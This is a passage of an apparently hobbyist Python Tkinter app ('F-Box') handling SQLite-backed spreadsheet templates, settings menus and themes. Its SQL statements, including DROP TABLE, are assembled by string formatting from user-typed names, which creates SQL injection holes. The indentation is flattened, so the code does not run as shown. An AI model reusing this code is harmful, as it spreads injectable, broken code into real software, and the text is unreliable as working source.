self.yes=Button(self.topframe,text='Yes',command=lambda answer='yes':self.message(answer))
self.yes.grid(row=1,column=0)
self.top12.bind('<Button-1>',self.flash)
self.top12.bind('<ButtonPress-1>',self.flash)
self.top12.bind('<Button-2>',self.flash)
self.top12.bind('<ButtonPress-2>',self.flash)
self.top12.bind('<Button-3>',self.flash)
self.top12.bind('<Button-4>',self.flash)
self.top12.bind('<Button-5>',self.flash)
self.no=Button(self.topframe,text='No',command=lambda answer='no':self.message(answer))
self.no.grid(row=1,column=1,padx=10)
self.top12.grab_set()
self.topframe.grid(row=0)
self.top12.focus_force()
    #warning sound if the user tries to shift focus away from the messagebox
def flash(self,event):
try:
if event.widget==self.top12:
self.top12.bell()
except AttributeError:
if event.widget==self.top17:
self.top17.bell()
    #messagebox callback that performs the overwriting
def message(self,answer):
if answer=='yes':
try:
data=sqlite3.connect('data.db')
connet=data.cursor()
self.top12.grab_release()
self.top12.destroy()
connet.execute("DROP TABLE {}".format(self.entry.get()))
connet.execute("""CREATE TABLE {}(cells TEXT,row1 TEXT,row2 TEXT,row3 TEXT,
row4 TEXT,row5 TEXT,row6 TEXT,row7 TEXT,row8 text)""".format(self.entry.get()))
for i in range(len(list9)):
connet.execute("INSERT INTO {}(cells) VALUES('{}')".format(self.entry.get(),list9[i].get(1.0,'end')))
list9[i].config(state='disabled')
self.entry.grid_forget()
self.c4.grid()
self.cle1.grid_forget()
self.sav1.grid_forget()
self.back.grid()
self.config.grid()
self.ted.entryconfig('Please Save The Template',state='normal',label='Create')
self.ted.entryconfig('Create',state='normal')
self.ted.entryconfig('Delete',state='normal')
self.ted.entryconfig('Load',state='normal')
self.ted.entryconfig('Edit',state='normal')
with open('loader.pk', 'wb') as f2:
self.data2=pickle.dump(self.entry.get(),f2)
f2.close()
with open('loader.pk','rb') as f2:
data3=pickle.load(f2)
self.template.config(text=data3)
data.commit()
data.close()
except AttributeError:
data=sqlite3.connect('data.db')
connet=data.cursor()
self.top17.grab_release()
self.top17.destroy()
connet.execute("DROP TABLE {}".format(self.entry2.get()))
connet.execute("""CREATE TABLE {}(cells TEXT,row1 TEXT,row2 TEXT,row3 TEXT,
row4 TEXT,row5 TEXT,row6 TEXT,row7 TEXT,row8 text)""".format(self.entry2.get()))
for i in range(len(list9)):
connet.execute("INSERT INTO {}(cells) VALUES('{}')".format(self.entry2.get(),list9[i].get(1.0,'end')))
list9[i].config(state='disabled')
self.cle2.grid_forget()
self.sav2.grid_forget()
self.entry2.grid_forget()
self.c4.grid()
self.back.grid()
self.config.grid()
self.ted.entryconfig('Please Save The Template',state='normal',label='Edit')
self.ted.entryconfig('Create',state='normal')
self.ted.entryconfig('Delete',state='normal')
self.ted.entryconfig('Load',state='normal')
with open('loader.pk', 'wb') as f2:
self.data2=pickle.dump(self.entry2.get(),f2)
f2.close()
connet.execute("DROP TABLE {}".format(self.value[self.value.index(' ')+2:]))
with open('loader.pk','rb') as f2:
data3=pickle.load(f2)
self.template.config(text=data3)
data.commit()
data.close()
if answer=='no':
try:
self.entry.focus_set()
self.top12.grab_release()
self.top12.destroy()
except AttributeError:
self.entry2.focus_set()
self.top17.grab_release()
self.top17.destroy()
#load function to load already created templates
def load(self):
self.top13=Toplevel(self.top)
self.top13.protocol('WM_DELETE_WINDOW',self.burst)
mwidth=self.top13.winfo_screenwidth()
mheight=self.top13.winfo_screenheight()
xwidth1=round(mwidth/2.3)
yheight1=round(mheight/2.3)
self.top13.geometry('{}x{}+{}+{}'.format(xwidth1,yheight1,round((mwidth/2)-(xwidth1/2)),round((mheight/2)-(yheight1/2))))
self.top13.resizable(0,0)
self.top13.grab_set()
self.top13.attributes('-toolwindow',True)
data=sqlite3.connect('data.db')
connet=data.cursor()
style=ttk.Style()
style.configure('mystyle.Treeview',highlightthickness=0,bd=0,font=('Calibri',11),rowheight=35,)
style.configure('mystyle.Treeview.Heading',font=('Calibri',13,'bold'))
style.layout('mystyle.Treeview',[('mystyle.Treeview.treearea',{'sticky':'nswe'})],)
style.configure('mystyle.Treeview',background='black')
images=Image.open(rb"C:\Users\PASCAL\Desktop\FES Project\project 1\templ.png")
images=images.resize((25,25))
images=ImageTk.PhotoImage(images)
self.loadframe=Frame(self.top13)
        #treeview that lists the template names
self.loadlist=ttk.Treeview(self.loadframe,columns=('#0','#1','#2'),style='mystyle.Treeview')
self.loadlist.heading('#0',text='Names',anchor='center')
self.loadlist.heading('#1',text='Date Created',anchor='center')
self.loadlist.heading('#2',text='Last Modified',anchor='center')
self.loadlist.column('#0',minwidth=300,width=300)
self.loadlist.column('#1',minwidth=190,width=190)
self.loadlist.column('#2',minwidth=190,width=190)
self.loadscroll=Scrollbar(self.loadframe,orient='horizontal')
self.loadscroll1=Scrollbar(self.loadframe,orient='vertical')
res=connet.execute("SELECT name FROM sqlite_master WHERE type='table' ").fetchall()
for i in range(len(res)):
self.loadlist.insert('',f'{i}',f'{i}',text=('{}'.format(res[i][0])),values=(0,10),image=images)
self.loadlist.images=images
self.loadlist.grid(row=0,column=0)
self.loadscroll.config(command=self.loadlist.xview)
self.loadscroll1.config(command=self.loadlist.yview)
self.loadscroll.grid(row=1,column=0,sticky='ew')
self.loadscroll1.grid(row=0,column=2,sticky='ns')
self.loadlist.config(xscrollcommand=self.loadscroll.set,yscrollcommand=self.loadscroll1.set)
self.loadlist.grid_propagate(False)
self.loadlist.focus_set()
self.top13.bind('<Button-1>',self.flash2)
self.top13.bind('<ButtonPress-1>',self.flash2)
self.top13.bind('<Button-2>',self.flash2)
self.top13.bind('<ButtonPress-2>',self.flash2)
self.top13.bind('<Button-3>',self.flash2)
self.top13.bind('<Button-4>',self.flash2)
self.top13.bind('<Button-5>',self.flash2)
self.loadframe.grid(row=0,column=0)
with open('loader.pk','rb') as f2:
data3=pickle.load(f2)
#indexer=list(self.loadlist.get(0,'end')).index('{} {}'.format('::::',data3,))
#self.loadlist.selection_set(indexer)
#self.loadlist.see(indexer)
#treeview selection binding
self.loadlist.bind('<<TreeviewSelect>>',self.load2)
self.loadlist.bind('<Button-3>',self.popup)
#handler for template selection in the load treeview
def load2(self,event):
try:
self.top13.grab_set()
sel=self.loadlist.selection()
if sel:
selc=self.loadlist.item(sel)
self.value=selc['text']
print(selc['text'])
except AttributeError:
sel=self.loadlist.selection()
self.value=self.loadlist.get(sel[0])
with open('loader.pk', 'wb') as f2:
self.data2=pickle.dump(self.value,f2)
f2.close()
data=sqlite3.connect('data.db')
connet=data.cursor()
names=connet.execute("SELECT cells FROM {}".format(self.value)).fetchall()
#if the template has no saved cells, ask whether to edit it
if len(names)==0:
self.top13.grab_release()
threading.Thread(target=self.top13.bell).start()
self.top14=Toplevel(self.top)
self.top14.resizable(0,0)
self.top14.focus_force()
self.top14.grab_set()
self.top14.attributes('-toolwindow',True)
self.top14.title('Name Null')
self.top14.protocol('WM_DELETE_WINDOW',self.erexit)
self.topframe2=Frame(self.top14)
self.question1=Label(self.topframe2,text="Template ({}) is empty, Do You Wish to Edit? ".format(self.value))
self.question1.grid(row=0,column=0)
self.yes1=Button(self.topframe2,text='Yes',command=lambda answer='yes',answer2='null':self.message2(answer,answer2))
self.yes1.grid(row=1,column=0)
self.top14.bind('<Button-1>',self.flash3)
self.top14.bind('<ButtonPress-1>',self.flash3)
self.top14.bind('<Button-2>',self.flash3)
self.top14.bind('<ButtonPress-2>',self.flash3)
self.top14.bind('<Button-3>',self.flash3)
self.top14.bind('<Button-4>',self.flash3)
self.top14.bind('<Button-5>',self.flash3)
self.no1=Button(self.topframe2,text='No',command=lambda answer='no',answer2='null':self.message2(answer,answer2))
self.no1.grid(row=1,column=1,padx=3)
self.topframe2.grid(row=0)
else:
self.top13.grab_set()
for i in range(len(names)):
list9[i].config(state='normal')
list9[i].delete(1.0,'end')
list9[i].insert(1.0,names[i][0])
list9[i].config(state='disabled')
#close the load window and restore focus to the main window
def burst(self):
with open('loader.pk','rb') as f2:
data3=pickle.load(f2)
self.template.config(text=data3)
self.top.focus_force()
self.top13.grab_release()
self.top13.destroy()
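#close the empty-template prompt and return control to the load window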
def erexit(self):
self.top14.destroy()
self.top13.grab_set()
#warning sound if focus is shifted away from the load window
def flash2(self,event):
if self.top13.winfo_containing(event.x_root,event.y_root)!=self.top13 and event.widget!=self.loadscroll1 and event.widget!=self.loadscroll and event.widget!=self.loadlist:
self.top13.bell()
#warning sound if focus is shifted away from the message box
def flash3(self,event):
try:
if event.widget==self.top14:
self.top14.bell()
except:
if event.widget==self.top18:
self.top18.bell()
#handle the yes/no answer of the edit prompt
def message2(self,answer,answer2):
if answer=='no':
self.top14.grab_release()
self.top14.destroy()
self.top13.grab_set()
self.top13.focus_force()
if answer=='yes':
try:
self.top.focus_force()
self.top14.grab_release()
self.top14.destroy()
self.top13.destroy()
except AttributeError:
self.top.focus_force()
self.top13.destroy()
data=sqlite3.connect('data.db')
connet=data.cursor()
names=connet.execute("SELECT cells FROM {}".format(self.value)).fetchall()
self.c4.grid_remove()
self.back.grid_remove()
self.config.grid_remove()
self.entry2=Entry(self.top,)
self.entry2.insert(0,self.value)
self.entry2.select_range(0,'end')
self.entry2.focus_set()
self.entry2.grid(row=3,column=0)
for ik in range(len(names)):
list9[ik].config(state='normal')
list9[ik].delete(1.0,'end')
list9[ik].insert(1.0,names[ik][0])
list9[ik].config(state='disabled')
for i in range(len(list9)):
list9[i].config(state='normal')
self.xc2=Image.open(rb"C:\Users\PASCAL\Desktop\FES Project\project 1\clear.png")
self.xc2=self.xc2.resize((round(self.width/7.68),round(self.height/29.19)))
self.xc2=ImageTk.PhotoImage(self.xc2)
self.yc2=Image.open(rb"C:\Users\PASCAL\Desktop\FES Project\project 1\savet.png")
self.yc2=self.yc2.resize((round(self.width/7.68),round(self.height/29.19)))
self.yc2=ImageTk.PhotoImage(self.yc2)
try:
self.cle2=Button(self.test10,image=self.xc2,borderwidth=0,bd=0,bg='grey')
self.sav2=Button(self.test10,image=self.yc2,borderwidth=0,bd=0,command=self.edit2)
self.cle2.grid(row=2,column=0,sticky='s')
self.sav2.grid(row=3,column=0,sticky='s')
self.ted.entryconfig('Edit',state='disabled')
self.ted.entryconfig('Create',state='disabled')
self.ted.entryconfig('Delete',state='disabled')
self.ted.entryconfig('Load',state='disabled')
finally:
self.ted.entryconfig('Edit',label='Please Save The Template')
#saving the template which was edited
def edit2(self):
data=sqlite3.connect('data.db')
connet=data.cursor()
confirm=connet.execute("SELECT name FROM sqlite_master WHERE type='table' AND name='{}'".format(self.entry2.get())).fetchone()
#validate the template name and handle errors
try:
#check whether the name is empty
if len(self.entry2.get())==0:
self.error6=showerror('Name Null','Template Name Null')
#check whether the name is purely numeric
elif self.entry2.get().isdigit():
self.error7=showerror("Name Null","Template Name\nCan't be Number")
#check whether the highlighted template still matches the record in the database after the name has been changed;
#if the edited name collides with an existing table, ask whether to overwrite it
elif confirm[0]!=self.value[self.value.index(' ')+2:] and len(confirm)>0:
self.top17=Toplevel(self.top)
self.top17.resizable(0,0)
self.top17.attributes('-toolwindow',True)
self.top17.protocol('WM_DELETE_WINDOW',lambda:threading.Thread(target=PlaySound('SystemQuestion',SND_ASYNC)).start())
self.topframe2=Frame(self.top17)
self.question3=Label(self.topframe2,text="Name '[{}]' Already Exists.\nClick [Yes] To overwrite, Click [No] To Cancel".format(self.entry2.get()))
self.question3.grid(row=0,column=0)
self.yes3=Button(self.topframe2,text='Yes',command=lambda answer='yes':self.message(answer))
self.yes3.grid(row=1,column=0)
self.top17.bind('<Button-1>',self.flash)
self.top17.bind('<ButtonPress-1>',self.flash)
self.top17.bind('<Button-2>',self.flash)
self.top17.bind('<ButtonPress-2>',self.flash)
self.top17.bind('<Button-3>',self.flash)
self.top17.bind('<Button-4>',self.flash)
self.top17.bind('<Button-5>',self.flash)
self.no3=Button(self.topframe2,text='No',command=lambda answer='no':self.message(answer))
self.no3.grid(row=1,column=1,padx=10)
self.top17.grab_set()
self.topframe2.grid(row=0)
self.top17.focus_force()
#if the table already exists, i.e. the template name was not changed
else:
connet.execute("DELETE FROM {}".format(self.entry2.get()))
for i in range(len(list9)):
connet.execute("INSERT INTO {}(cells) VALUES('{}')".format(self.entry2.get(),list9[i].get(1.0,'end')))
list9[i].config(state='disabled')
self.entry2.grid_forget()
self.cle2.grid_forget()
self.sav2.grid_forget()
self.c4.grid()
self.config.grid()
self.back.grid()
self.ted.entryconfig('Please Save The Template',state='normal',label='Edit')
self.ted.entryconfig('Edit',state='normal')
self.ted.entryconfig('Create',state='normal')
self.ted.entryconfig('Delete',state='normal')
self.ted.entryconfig('Load',state='normal')
with open('loader.pk','rb') as f2:
data3=pickle.load(f2)
self.template.config(text=data3)
data.commit()
data.close()
#if the name was changed to one not yet in the database, confirm is None and indexing it raises TypeError;
#in that case the old table is dropped and recreated under the new name
except TypeError:
data=sqlite3.connect('data.db')
connet=data.cursor()
#drop the originally selected table now that the template has been renamed
connet.execute("DROP TABLE {}".format(self.value[self.value.index(' ')+2:]))
connet.execute("""CREATE TABLE {}(cells TEXT,row1 TEXT,row2 TEXT,row3 TEXT,
row4 TEXT,row5 TEXT,row6 TEXT,row7 TEXT,row8 text)""".format(self.entry2.get()))
for i in range(len(list9)):
connet.execute("INSERT INTO {}(cells) VALUES('{}')".format(self.entry2.get(),list9[i].get(1.0,'end')))
list9[i].config(state='disabled')
self.entry2.grid_forget()
self.c4.grid()
self.cle2.grid_forget()
self.sav2.grid_forget()
self.back.grid()
self.config.grid()
self.ted.entryconfig('Please Save The Template',state='normal',label='Edit')
self.ted.entryconfig('Create',state='normal')
self.ted.entryconfig('Delete',state='normal')
self.ted.entryconfig('Load',state='normal')
with open('loader.pk', 'wb') as f2:
self.data2=pickle.dump(self.entry2.get(),f2)
self.template.config(text=self.entry2.get())
data.commit()
data.close()
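#warning sound if focus is shifted away from the top16 message box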
def flash4(self,event):
if event.widget==self.top16:
self.top16.bell()
#handle the yes/no answer of the template-deletion prompt
def message3(self,answer):
#if the answer is yes, drop the table from the database, remove the entry from the list and activate the template above it
if answer=='yes':
data=sqlite3.connect('data.db')
connet=data.cursor()
self.top18.grab_release()
self.top18.destroy()
connet.execute("DROP TABLE {}".format(self.value[self.value.index(' ')+2:]))
indexer=list(self.loadlist.get(0,'end')).index('{} {}'.format('::::',self.value[self.value.index(' ')+2:],))
self.loadlist.delete(indexer)
try:
indexe=self.loadlist.get(indexer-1)
#pickling the upper template for loading references
with open('loader.pk', 'wb') as f2:
self.data2=pickle.dump(self.value[indexe.index(' ')+2:],f2)
f2.close()
self.loadlist.selection_clear(0,'end')
self.loadlist.selection_set(indexer-1)
self.loadlist.see(indexer-1)
self.loadlist.activate(indexer-1)
self.loadlist.selection_anchor(indexer-1)
#call the load2 function to activate the template above
self.load2('l')
data.commit()
data.close()
self.top13.grab_set()
except ValueError:
indexe=self.loadlist.get(0)
#pickling the upper template for loading references
with open('loader.pk', 'wb') as f2:
self.data2=pickle.dump(self.value[indexe.index(' ')+2:],f2)
f2.close()
self.loadlist.selection_clear(0,'end')
self.loadlist.selection_set(0)
self.loadlist.see(0)
self.loadlist.activate(0)
self.loadlist.selection_anchor(0)
#call the load2 function to activate the template above
self.load2('l')
data.commit()
data.close()
self.top13.grab_set()
if answer=='no':
self.top18.grab_release()
self.top18.destroy()
self.top13.grab_set()
#deletion prompt shown when Delete is clicked
def delete(self):
self.top18=Toplevel(self.top)
self.top18.bell()
self.top18.resizable(0,0)
self.top18.attributes('-toolwindow',True)
self.top18.protocol('WM_DELETE_WINDOW',lambda:threading.Thread(target=PlaySound('SystemQuestion',SND_ASYNC)).start())
self.topframe3=Frame(self.top18)
self.question4=Label(self.topframe3,
text="Do You Want To Proceed To Delete The Template ({}).\nClick [Yes] To overwrite, Click [No] To Cancel".format(self.value[self.value.index(' ')+2:]))
self.question4.grid(row=0,column=0)
self.yes4=Button(self.topframe3,text='Yes',command=lambda answer='yes':self.message3(answer))
self.yes4.grid(row=1,column=0)
self.top18.bind('<Button-1>',self.flash3)
self.top18.bind('<ButtonPress-1>',self.flash3)
self.top18.bind('<Button-2>',self.flash3)
self.top18.bind('<ButtonPress-2>',self.flash3)
self.top18.bind('<Button-3>',self.flash3)
self.top18.bind('<Button-4>',self.flash3)
self.top18.bind('<Button-5>',self.flash3)
self.no4=Button(self.topframe3,text='No',command=lambda answer='no':self.message3(answer))
self.no4.grid(row=1,column=1)
self.top18.grab_set()
self.topframe3.grid(row=0)
self.top18.focus_force()
#popup menu shown when right-clicking a treeview item, exposing edit/delete actions
def popup(self,event):
self.loadlist.selection_set(self.loadlist.identify_row(event.y))
#self.loadlist.activate(self.loadlist.nearest(event.y))
sel=self.loadlist.selection()
selc=self.loadlist.item(sel)
self.value=selc['text']
with open('loader.pk', 'wb') as f2:
self.data2=pickle.dump(self.value,f2)
self.men10=Menu(self.top13,tearoff=0,bg='black',activebackground='white',
activeforeground='black',font=('Time',10),fg='white',activeborderwidth=0,bd=0,relief=FLAT)
self.men10.add_cascade(label='Template: {}'.format(self.value))
self.men10.add_separator()
self.men10.add_command(label='Edit ({})'.format(self.value),
command=lambda answer='yes',answer2='null':self.message2(answer,answer2))
self.men10.add_separator()
self.men10.add_command(label='Delete ({})'.format(self.value),command=self.delete)
self.men10.add_separator()
self.men10.add_command(label='Properties')
self.popup1(event.x_root,event.y_root)
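#show the right-click menu at the given screen coordinates, releasing its grab afterwards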
def popup1(self,x,y):
try:
self.men10.tk_popup(x,y)
finally:
self.men10.grab_release()
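#switch the main cell rows into edit mode: enable every cell and show the clear/save buttons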
def change(self):
self.xc=Image.open(rb"C:\Users\PASCAL\Desktop\FES Project\project 1\clear.png")
self.xc=self.xc.resize((round(self.width/7.68),round(self.height/29.19)))
self.xc=ImageTk.PhotoImage(self.xc)
self.yc=Image.open(rb"C:\Users\PASCAL\Desktop\FES Project\project 1\save.png")
self.yc=self.yc.resize((round(self.width/7.68),round(self.height/29.19)))
self.yc=ImageTk.PhotoImage(self.yc)
self.back.grid_forget()
self.config.grid_forget()
try:
for i in range(len(list9)):
list9[i].config(state='normal')
self.cle=Button(self.test10,image=self.xc,borderwidth=0,bd=0,bg='grey',command=self.change2)
self.sav=Button(self.test10,image=self.yc,borderwidth=0,bd=0,command=self.change1)
self.cle.grid(row=2,column=0,sticky='s')
self.sav.grid(row=3,column=0,sticky='s')
self.ted.entryconfig('Edit',state='disabled')
finally:
self.ted.entryconfig('Edit',label='Please Save The Template')
self.config_themes7()
#function to save the cell row names in the database (data.db)
def change1(self):
data=sqlite3.connect('data.db')
connet=data.cursor()
self.names=connet.execute("SELECT cells FROM data").fetchall()
self.ted.entryconfig('Please Save The Template',state='normal',label='Create')
self.config.grid(row=1,column=0)
self.back.grid(row=2,column=0)
self.sav.grid_forget()
self.cle.grid_forget()
#case where no cell row names have been saved yet
if len(self.names)==0:
for i in range(len(list9)):
connet.execute("INSERT INTO data(cells) VALUES('{}')".format(list9[i].get(1.0,'end')))
list9[i].config(state='disabled')
data.commit()
data.close()
#case where the existing cell row names are updated
else:
connet.execute("DELETE FROM data")
for i in range(len(list9)):
connet.execute("INSERT INTO data(cells) VALUES('{}')".format(list9[i].get(1.0,'end')))
list9[i].config(state='disabled')
data.commit()
data.close()
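#clear the contents of every cell row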
def change2(self):
for i in range(len(list9)):
list9[i].delete(1.0,'end')
#settings menu function
def bind(self):
self.top5=Toplevel()
self.top5.config(bg='white')
self.top5.resizable(0,0)
self.top5.grab_set()
self.top5.focus_set()
self.xwidth=self.top5.winfo_screenwidth()
self.yheight=self.top5.winfo_screenheight()
self.gwidth=round(self.top5.winfo_screenwidth()/2.09)
self.gheight=round(self.top5.winfo_screenheight()/1.32)
self.top5.geometry('{}x{}+{}+{}'.format(self.gwidth,self.gheight,round((self.xwidth/2)-(self.gwidth/2)),
round((self.yheight/2)-(self.gheight/2))))
self.top5.attributes('-toolwindow',True)
list_frame=Frame(self.top5)
self.frame=Frame(self.top5)
self.frame2=Frame(self.top5)
self.frame3=Frame(self.top5,bd=0,borderwidth=0,bg='white')
self.hc=Canvas(self.top5,width=round(self.xwidth/2.18))
self.frame4=Frame(self.hc,width=round(self.xwidth/2.26))
self.hsc=Scrollbar(self.top5,orient='vertical')
self.hsc1=Scrollbar(self.top5,orient='horizontal')
string=StringVar()
string.set('Row')
self.option=Listbox(list_frame,width=round(self.xwidth/24),height=round(self.yheight/154.29),
font=('Helvectica',10))
self.b=['Security','Themes','Configure Functions','How it Works','About','Support And Donation',
'Restore App To Factory State']
for c in self.b:
self.option.insert('end',c)
self.option.grid(row=1,column=0,sticky='ns')
list_frame.grid(row=1,column=0,sticky='w')
self.option.bind('<<ListboxSelect>>',self.pri)
self.option.selection_set(0)
self.option.see(0)
self.security()
self.config_themes2()
def pri(self,event):
wid=event.widget
sel=wid.curselection()
value=wid.get(sel[0])
#open the settings panel that matches the selected entry
if value=='Themes':
self.themes()
if value=='Security':
self.security()
if value=='Configure Functions':
self.cf()
if value=='How it Works':
self.hiw()
if value=='About':
self.about()
if value=='Support And Donation':
self.sad()
if value=='Restore App To Factory State':
self.ras()
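#Themes panel: theme preview images and the checkbuttons that select the active theme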
def themes(self):
self.hsc.grid_forget()
self.hsc1.grid_forget()
self.hc.grid_forget()
self.frame3.grid_forget()
self.frame.grid(row=4,column=0,sticky='w')
white=Image.open(r"C:\Users\PASCAL\Desktop\FES Project\project 1\white.png")
white=white.resize((round(self.xwidth/4.8),round(self.yheight/10.8)))
white=ImageTk.PhotoImage(white)
ash=Image.open(r"C:\Users\PASCAL\Desktop\FES Project\project 1\ashes.png")
ash=ash.resize((round(self.xwidth/4.8),round(self.yheight/10.8)))
ash=ImageTk.PhotoImage(ash)
blue=Image.open(r"C:\Users\PASCAL\Desktop\FES Project\project 1\dark blue.png")
blues=blue.resize((round(self.xwidth/4.8),round(self.yheight/10.8)))
blue=ImageTk.PhotoImage(blues)
black=Image.open(r"C:\Users\PASCAL\Desktop\FES Project\project 1\Black.png")
black=black.resize((round(self.xwidth/4.8),round(self.yheight/10.8)))
black=ImageTk.PhotoImage(black)
self.cha=Label(self.frame,text='Choose your desired Theme',font=('Time',round(self.xwidth/160),'bold'),borderwidth=0,bd=0,
fg='black')
self.cha.grid(row=2,column=0,sticky='w')
#theme previews: background and text colour options
first_color=Label(self.frame,image=ash,font=('helvectica',13,'bold'),bg='grey').grid(row=3,column=0,sticky='w')
second_color=Label(self.frame,image=black,font=('helvectica',13,'bold'),bg='black').grid(row=4,column=0,sticky='w')
third_color=Label(self.frame,image=blue,font=('helvectica',13,'bold'),bg='#151930').grid(row=5,column=0,sticky='w')
forth_color=Label(self.frame,image=white,font=('helvectica',13,'bold'),bg='white').grid(row=6,column=0,sticky='w')
self.va1=IntVar()
with open('check.pkl','rb') as f1:
data=pickle.load(f1)
self.va1.set(data)
var1=Checkbutton(self.frame,text='',var=self.va1,onvalue=1,bd=1,borderwidth=0,command=self.config_themes).grid(row=3,column=2,sticky='w')
var2=Checkbutton(self.frame,text='',var=self.va1,onvalue=2,bd=1,borderwidth=0,command=self.config_themes).grid(row=4,column=2,sticky='w')
var3=Checkbutton(self.frame,text='',var=self.va1,onvalue=3,bd=1,borderwidth=0,command=self.config_themes).grid(row=5,column=2,sticky='w')
var4=Checkbutton(self.frame,text='',var=self.va1,onvalue=4,bd=1,borderwidth=0,command=self.config_themes).grid(row=6,column=2,sticky='w')
#security panel of the settings menu
def security(self):
self.hsc.grid_forget()
self.hsc1.grid_forget()
self.hc.grid_forget()
self.frame.grid_forget()
account=Button(self.frame3,text='Account',font=('helvectica',13),bd=2,borderwidth=0,fg='red',bg='white')
account.grid(row=0,column=0)
namesl=Label(self.frame3,text='Users',font=('helveectica',13,'bold'),bd=0,borderwidth=0,bg='white',fg='black')
namesl.grid(row=1,column=0,pady=15)
acct_list=ttk.Treeview(self.frame3,column=('A'))
acct_list.heading('#0',text='Users',anchor='center')
acct_list.column('A',anchor='center',width=100)
account=sqlite3.connect('account.db')
connet=account.cursor()
user_name=connet.execute("SELECT name FROM account").fetchall()
pass_word=connet.execute("SELECT password FROM account").fetchall()
account.commit()
account.close()
for c in user_name:
acct_list.insert('','end',text=c[0])
acct_list.grid(row=3)
self.frame3.grid(row=4,column=0,sticky='nwes')
# configure-functions panel of the settings menu
def cf(self):
self.hsc.grid_forget()
self.hsc1.grid_forget()
self.hc.grid_forget()
self.frame4.grid_forget()
self.frame3.grid_forget()
self.frame.grid_forget()
# How-it-Works panel of the settings menu
def hiw(self):
self.hsc.grid_forget()
self.hsc1.grid_forget()
self.hc.grid_forget()
self.frame4.grid_forget()
self.frame3.grid_forget()
self.frame.grid_forget()
hl=Label(self.frame4,text=''' The F-Box is a miniature office suite comprising a spreadsheet, a word processor and a file viewer, combined
 into a single piece of software called F-Box. The F-Box is simple and straightforward to use: no prior experience
 with a word processor or spreadsheet is required, so anyone can use it.
 How to use the F-Box:
 1) The spreadsheet menus (Financials, Monthly) are limited compared to other suites, but they can handle basic tasks
 and include built-in functions for mathematical and statistical analysis.
 2) The spreadsheet menus provide only 26 rows and 8 columns; the rows and columns can be used interchangeably without
 errors by enabling this in the settings.
 3) The spreadsheet and memo menus can both print saved documents on your default printer. Printing can also
 be done from the saved-files menu.
 4) Both the spreadsheet and the memo have edit functions, i.e. you can edit already saved files. Note: only files created with the F-Box,
 not with any other software.
 5) The memo works like an advanced text editor, i.e. you can insert images for better editing of your memos.
 6) The product isn't perfect, but it can be used for basic analysis rather than large-scale analysis.
 7) The app and your saved documents are protected, so there is no fear of data loss; access is governed by the account created when
 you first open the F-Box.''',justify='left')
hl.grid(row=1,sticky='w')
self.hc.update_idletasks()
self.hc.create_window(0,0,anchor='w',window=self.frame4)
self.hc.config(scrollregion=self.hc.bbox('all'),yscrollcommand=self.hsc.set,xscrollcommand=self.hsc1.set)
self.hsc.config(command=self.hc.yview)
self.hsc1.config(command=self.hc.xview)
self.hsc1.grid(row=5,column=0,sticky='ew')
self.hsc.grid(row=4,column=1,sticky='ns')
#self.frame4.grid(row=4)
self.hc.grid(row=4,column=0,sticky='w')
# About function for the about menu
def about(self):
self.hsc.grid_forget()
self.hsc1.grid_forget()
self.hc.grid_forget()
self.frame4.grid_forget()
self.frame3.grid_forget()
self.frame.grid_forget()
self.frame2.grid_forget()
# Support and Donation panel of the settings menu
def sad(self):
self.hsc.grid_forget()
self.hsc1.grid_forget()
self.hc.grid_forget()
self.frame4.grid_forget()
self.frame3.grid_forget()
self.frame.grid_forget()
self.frame2.grid_forget()
# restore-app-to-factory-state panel of the settings menu
def ras(self):
self.hsc.grid_forget()
self.hsc1.grid_forget()
self.hc.grid_forget()
self.frame4.grid_forget()
self.frame3.grid_forget()
self.frame.grid_forget()
self.frame2.grid_forget()
print('ye4')
#applies the chosen theme live, i.e. it re-colours the individual menus while the program is running; if the pickled
#value is 0 the theme stays unchanged, and values 1-4 switch it through grey, black, blue and white
def config_themes(self):
self.var_butt=self.va1.get()
with open('check.pkl','wb') as f1:
pickle.dump(self.var_butt,f1)
with open('check.pkl','rb') as f1:
self.data=pickle.load(f1)
if self.data==0:
try:
self.c4.config(bg='white')
self.testy.config(bg='white')
self.config.config(bg='white')
self.test10.config(bg='white')
self.test9.config(bg='white')
self.c3.config(bg='white')
self.testf.config(bg='white')
self.toolbar.config(bg='white')
self.toolbar2.config(bg='white')
self.f6.config(bg='white')
self.f7.config(bg='white')
self.top.config(bg='white')
self.top5.config(bg='white')
self.one.config(bg='white',fg='black',activebackground='grey',activeforeground='white')
self.two.config(bg='white',fg='black',activebackground='grey',activeforeground='white')
self.three.config(bg='white',fg='black',activebackground='grey',activeforeground='white')
self.four.config(bg='white',fg='black',activebackground='grey',activeforeground='white')
self.five.config(bg='white',fg='black',activebackground='grey',activeforeground='white')
self.six.config(bg='white')
self.seven.config(bg='white')
self.eight.config(bg='white')
self.option.config(bg='white',fg='black')
for c,c1,c2,c3,c4,c5,c6,c7,c8 in zip(kist,list2,list3,list4,list5,list6,list7,list8,list9):
c.configure(fg='black',bg='white',insertbackground='black')
c1.configure(fg='black',bg='white',insertbackground='black')
c2.configure(fg='black',bg='white',insertbackground='black')
c3.configure(fg='black',bg='white',insertbackground='black')
c4.configure(fg='black',bg='white',insertbackground='black')
c5.configure(fg='black',bg='white',insertbackground='black')
c6.configure(fg='black',bg='white',insertbackground='black')
c7.configure(fg='black',bg='white',insertbackground='black')
c8.configure(fg='black',bg='white',insertbackground='black')
for c9,c10 in zip(h10,h11):
c9.configure(bg='white')
c10.configure(bg='white')
self.p1.configure(fg='black')
except AttributeError:
self.option.config(bg='white',fg='black')
self.top5.config(bg='white')
if self.data==1:
try:
self.c4.config(bg='grey')
self.testy.config(bg='grey')
self.config.config(bg='grey')
self.c3.config(bg='grey')
self.testf.config(bg='grey')
self.test10.config(bg='grey')
self.test9.config(bg='grey')
self.testy.config(bg='grey')
self.toolbar.config(bg='grey')
self.toolbar2.config(bg='grey')
self.f6.config(bg='grey')
self.f7.config(bg='grey')
self.one.config(bg='grey',fg='white',activebackground='black',activeforeground='white')
self.two.config(bg='grey',fg='white',activebackground='black',activeforeground='white')
self.three.config(bg='grey',fg='white',activebackground='black',activeforeground='white')
self.four.config(bg='grey',fg='white',activebackground='black',activeforeground='white')
self.five.config(bg='grey',fg='white',activebackground='black',activeforeground='white')
self.six.config(bg='grey')
self.seven.config(bg='grey')
self.eight.config(bg='grey')
self.top.config(bg='grey')
self.top5.configure(bg='grey')
self.option.config(bg='grey',fg='white')
for c,c1,c2,c3,c4,c5,c6,c7,c8 in zip(kist,list2,list3,list4,list5,list6,list7,list8,list9):
c.configure(bg='grey',fg='white',insertbackground='white')
c1.configure(bg='grey',fg='white',insertbackground='white')
c2.configure(bg='grey',fg='white',insertbackground='white')
